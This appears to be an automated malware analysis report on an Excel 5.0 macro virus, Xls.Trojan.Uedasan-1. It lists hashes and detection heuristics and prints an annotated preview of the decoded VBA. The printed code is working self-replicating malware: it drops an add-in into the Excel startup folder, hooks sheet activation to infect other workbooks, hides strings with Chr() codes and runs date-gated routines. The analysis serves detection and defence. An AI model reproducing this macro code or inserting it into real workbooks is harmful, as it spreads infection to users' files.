Xls.Trojan.Uedasan-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 39023abb44422eb4…

MALICIOUS

Office (OLE)

138.5 KB Created: 2000-01-11 21:44:28 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 48e59d9edce5e9901ed059dd8f36077d SHA-1: 35582bada7880de6bf95826609d926eef8e6b656 SHA-256: 39023abb44422eb4b1269fb32119acb857ea59afbb457b09e9d06af0af2292c2
240 Risk Score

Malware Insights

Xls.Trojan.Uedasan-1 · confidence 95%

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic); T1566.001 (Phishing: Spearphishing Attachment)

The file is identified as a malicious Excel 5.0 macro-virus, specifically 'Xls.Trojan.Uedasan-1', by multiple critical heuristics. The Auto_open macro copies the workbook's hidden " A-TPC " module sheet into a new workbook and saves it to the Excel startup directory as '#1SLIDER.XLA' (a random number is appended to the name only when a workbook of that name is already open, which reads as collision avoidance rather than a deliberate evasion step), so the dropped add-in is loaded on every subsequent Excel start. It then registers the add-in's scan routine on Application.OnSheetActivate; scan copies the module sheet into each unprotected workbook the user activates, protects the inserted sheet with the password 'uedasan', and skips workbooks whose cell A16384 already holds the string 'uedasan' (an infection/immunity marker). The extracted code shows self-replication plus date/time-gated routines (Status calls DO_EVERYTHING in month 4 and DO_SOMETHING before 06:00 from month 4 onward; their bodies fall outside the truncated preview). No network activity or second-stage download is visible in the extracted macro, so "drop a second-stage payload" is not supported by the visible code.

Heuristics 4

  • ClamAV: Xls.Trojan.Uedasan-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Uedasan-1
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 22558 bytes
SHA-256: 03c9d2fbf75e293355f3d35c506898740dfa8e619e12729d24bfd2bd6070d5e8
Detection
ClamAV: Xls.Trojan.Uedasan-1
Obfuscation or payload: unlikely (automated verdict; note that the preview does build several strings from Chr() codes — the module name " A-TPC ", the 'uedasan' marker/password and the cell address A16384 — and disguises the trigger constants in Status() as arithmetic, so light string obfuscation is present even though no encoded payload is visible)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = " A-TPC "



'
'
'
'
'
'
Option Explicit
' File name of the dropped add-in written to the Excel startup directory
' by Auto_open; scan() is later invoked as "<Id>!scan".
Public Const Id As String = "#1SLIDER.XLA"
' Name of the hidden module sheet (" A-TPC ", same as this module's VB_Name);
' rebuilt from Chr() codes at runtime in Auto_open and scan.
Public m_id As String
' Entry point: Excel runs this automatically when the infected workbook opens.
' Drops a copy of the hidden " A-TPC " module sheet into the Excel startup
' directory as "#1SLIDER.XLA" (the Id constant) and then hooks sheet activation
' so that scan() in the dropped file runs in every workbook the user touches.
Sub Auto_open()
Attribute Auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim chklog As Variant
' NOTE(review): in VBA only the last name of a comma-separated Dim gets the
' declared type -- cpotting and wafer are Variant, only idhld is String
' (same for bookname below).
Dim cpotting, wafer, idhld As String
Dim bookname, c4 As String
   ' nexts is not defined in the visible part of the extract (preview is truncated).
   nexts
   ' " A-TPC " assembled from Chr() codes -- matches this module's VB_Name.
   m_id = Chr(32) + Chr(65) & "-" & Chr(84) + Chr(80) + Chr(67) + Chr(32)
   ' Excel startup directory: anything saved here is opened on every Excel start.
   cpotting = Application.StartupPath & Application.PathSeparator
   make cpotting
   ' Dir returns "" when the dropper file does not exist yet.
   wafer = Dir(cpotting & Id)
   If UCase(wafer) = "" Then
        Application.ScreenUpdating = False
        ' New workbook that will become the dropped add-in.
        Workbooks.Add (xlWorksheet)
        ActiveWindow.DisplayWorkbookTabs = False
        ' Unhide the module sheet, copy it into the new workbook, hide it again.
        ThisWorkbook.Sheets(m_id).Visible = True
        ThisWorkbook.Sheets(m_id).Copy before:=ActiveWorkbook.Sheets(1)
        ThisWorkbook.Sheets(m_id).Visible = False
        ' Junk document properties -- usable as static indicators of the dropped file.
        With ActiveWorkbook
           .Title = "#$%#$%#$@#@##$$$####@@@#@##$%$%$%^"
           .Subject = "«Ü.++I¤¦XJ-K_æ"
           .Author = "@@!@!@!#$#$%^**&%#^%^***"
           .Keywords = ">>>>>>>>>>>>>>>>>> F.Y."
           .Comments = "+666.............13.............OMEN+"
        End With
        idhld = Id
        ' If a workbook named Id is already open, SaveAs would collide with it;
        ' append a random number to the target file name in that case only.
        For Each chklog In Application.Workbooks
            If chklog.Name = Id Then
              Randomize
              idhld = Id & Rnd()
            End If
         Next
        bookname = ActiveWorkbook.Name
        ' Remember the current directory so it can be restored after the save.
        c4 = CurDir()
        ChDir Application.StartupPath
        ' Hide the new workbook's window before saving it.
        ActiveWindow.Visible = False
        ' Persistence: write the add-in into the startup directory.
        Workbooks(bookname).SaveAs filename:=cpotting & idhld, FileFormat:=xlNormal, CreateBackup:=True
        ' Also hides the first sheet of the host (infected) workbook.
        ThisWorkbook.Sheets(1).Visible = False
        ChDir c4
        Application.ScreenUpdating = False
 End If
' Infection hook: from now on every sheet activation calls "#1SLIDER.XLA!scan".
Application.OnSheetActivate = Id & "!scan"
End Sub
' Best-effort creation of the target directory. Only the first 25 characters
' of locat are passed to MkDir (presumably relies on a short startup path --
' the truncation is not explained by the code); any error is swallowed by
' On Error Resume Next, so a failure here is silent.
Private Sub make(ByVal locat As String)
On Error Resume Next
Err = 0
  MkDir Left(locat, 25)
  If Err <> 0 Then
    ' Nothing else to do; the Sub would end here anyway.
    Exit Sub
  End If
End Sub
' Infection/immunity marker check used by scan(): returns True if any
' worksheet of the active workbook has the string "uedasan" in cell A16384
' (both strings are assembled from Chr() codes). scan() does not infect a
' workbook for which this returns True. No error handler of its own; a
' failure here propagates to the On Error Resume Next active in scan().
Private Function coding()
Dim TESTER As Range
Dim logentry As Variant
coding = False
For Each logentry In Application.Worksheets
' Chr(97)+Chr(49)+Chr(54)+Chr(51)+Chr(56)+Chr(52) = "a16384"
Set TESTER = Worksheets(logentry.Name).Range(Chr(97) + Chr(49) + Chr(54) + Chr(51) + Chr(56) + Chr(52))
 ' Chr(117)...Chr(110) = "uedasan"; compares the cell's default (Value) property.
 If TESTER = Chr(117) + Chr(101) + Chr(100) + Chr(97) + Chr(115) + Chr(97) + Chr(110) Then
  coding = True
  Exit For
  End If
Next
End Function
' Replication routine, invoked from the dropped add-in on every sheet
' activation (see Application.OnSheetActivate in Auto_open). Copies the
' " A-TPC " module sheet from Workbooks(Id) into the active workbook unless
' it is structure-protected, already carries the module, or has the
' "uedasan" marker (coding()). Also pops up fake "VIRUS DETECTED" alerts for
' modules belonging to other macro viruses it recognises by name.
Sub scan()
Attribute scan.VB_ProcData.VB_Invoke_Func = " \n14"
' NOTE(review): only chkstruc is Boolean and only slider is String here;
' checking and no1 are Variant (VBA comma-Dim semantics).
Dim checking, chkstruc As Boolean
Dim no1, slider As String
Dim LOGNAME As Variant
         checking = False
         ' " A-TPC " from Chr() codes, as in Auto_open.
         m_id = Chr(32) + Chr(65) & "-" & Chr(84) + Chr(80) + Chr(67) + Chr(32)
         On Error Resume Next
         Err = 0
         ' Reading ProtectStructure can fail (e.g. no active workbook); bail out then.
         chkstruc = ActiveWorkbook.ProtectStructure
         If Err <> 0 Then GoTo placeb
         ' Only unprotected workbooks can receive the extra sheet.
         If chkstruc = False Then
         Application.ScreenUpdating = False
         no1 = ActiveWorkbook.Name
         ' slider is assigned but never used below.
         slider = Workbooks(no1).Sheets(1).Name
         ' Walk the open modules: detect self (already infected) and rival viruses.
         For Each LOGNAME In Application.Modules
            If LOGNAME.Name = m_id Then
             checking = True
            ElseIf LOGNAME.Name = "me" Then
                   MsgBox "WARNING : VIRUS DETECTED! NAME : 'XM.Laroux.DP'"
            ElseIf LOGNAME.Name = "pldt" Then
                   MsgBox "WARNING : VIRUS DETECTED! NAME : 'MERALCO'"
            ElseIf Len(LOGNAME.Name) >= 25 Then
                   MsgBox "WARNING : VIRUS DETECTED! NAME : 'XM.Extras.A'"
            End If
         Next
        ' Infect: not already present and no "uedasan" marker in A16384.
        If checking = False And Not coding Then
            ' Copy the module sheet out of the dropped add-in (must be open as Workbooks(Id)).
            Workbooks(Id).Sheets(m_id).Copy before:=Workbooks(no1).Sheets(1)
            ' Sheets(1) is now the inserted module sheet; protect it with password "uedasan" (Chr codes).
            ActiveWorkbook.Sheets(1).Protect password:=Chr(117) + Chr(101) + Chr(100) + Chr(97) + Chr(115) + Chr(97) + Chr(110)
            Workbooks(no1).Sheets(m_id).Visible = False
            ' Date/time-gated routines run right after a successful infection.
            Status
        End If
       End If
placeb:
Application.ScreenUpdating = False
End Sub
' Trigger logic. The month constant is hidden behind arithmetic:
' Int(Sqr(355 / Sqr(3995) * 31 ^ 2)) - 69 works out to 4 (April), and
' Int(Sqr(4 * 62) / 2.6) works out to 6. So DO_EVERYTHING runs in April and
' DO_SOMETHING runs from April onward before 06:00. Neither DO_EVERYTHING nor
' DO_SOMETHING is defined in the visible part of the extract (preview truncated).
Private Sub Status()
 If Month(Now) = Int(Sqr((355 / Sqr(3995) * ((31 / 4) * 4) ^ 2))) - 69 Then
   DO_EVERYTHING
 End If
' Month >= 4 And Hour < 6.
If (Month(Now) >= Int(Sqr((355 / Sqr(3995) * ((31 / 4) * 4) ^ 2))) - 69 _
   And Hour(Now) < Int(Sqr(4 * 62) / 2.6)) Then
    DO_SOMETHING
End If
End Sub
P
... (truncated)